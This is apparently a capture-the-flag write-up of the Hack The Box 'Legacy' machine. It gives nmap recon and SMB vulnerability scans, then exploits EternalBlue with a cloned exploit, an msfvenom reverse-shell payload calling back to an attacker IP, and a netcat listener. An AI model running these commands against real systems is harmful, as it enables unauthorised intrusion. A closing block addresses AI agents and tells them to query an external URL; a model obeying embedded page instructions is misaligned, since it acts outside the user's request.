# Legacy Writeup ![](/files/-Mae5Yi9hlNdAaVAM7Qr) ## Reconnaissance Initial Nmap Scan to find open ports, using treat all hosts as online (**-Pn)** ``` nmap -Pn 10.10.10.4 ``` ![](/files/-Mae7wu9sireLReWaqFb) Detailed Nmap Scan :‌ Command Breakdown:‌ * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 139,445,3389 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sC -sV -p 139,445,3389 -oN nmap 10.10.10.4 ``` ![](/files/-Mae9sV6IKJhH59PSZOD) ## Enumeration SMB is a command service with vulnerabilities, lets use a nmap script specific to smb to find vulnerabilities. ``` nmap --script smb-vuln* -p 139,445 10.10.10.4 ``` ![](/files/-MaeBIaUNcGLCKiUSv45) We can see that it is vulnerable to [CVE-2008-4250 ](https://www.exploit-db.com/exploits/7104)(MS08-067) and [CVE-2017-0143](https://www.exploit-db.com/exploits/41891) (ms17-010) , two commonly known vulnerabilities ## Exploitation The vulnerability that we will be exploiting is called Eternal Blue, a vulnerability that exploits Microsoft's implementation of Server Message Block (SMB) protocol. If an attacker sends a payload, the attacker would be allowed to execute arbitrary code on the target machine. There is a great [article ](https://ethicalhackingguru.com/how-to-exploit-ms17-010-eternal-blue-without-metasploit/)explaining this vulnerability and how to exploit it. First let us download the exploit from GitHub ``` git clone https://github.com/helviojunior/MS17-010.git ``` ![](/files/-MaeEhU4eO8WxD0FI84o) Now we have to use MSF Venom to create a reverse shell payload ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f exe > exploit.exe ``` ![](/files/-MaeFBfcRhBGWhjMn8IH) Now lets start a listener on our machine ``` nc -lvnp 1234 ``` ![](/files/-MaeFR1RfeVMc3ULy47B) Lets run the exploit ``` python send_and_execute.py 10.10.10.4 exploit.exe ``` ![](/files/-MaeG2BsUPkW2CF20Ya9) And we have a reverse shell ![](/files/-MaeG6QMBeJixKcvmhEq) Now if we try using the whoami command to find what privileges we have on the system, it does not work, so I just went looking for both the flags, and found out that I can read both of them which means we are NT AUTHORITY\SYSTEM. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/hackthebox/linux-boxes-w-o-metasploit/legacy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.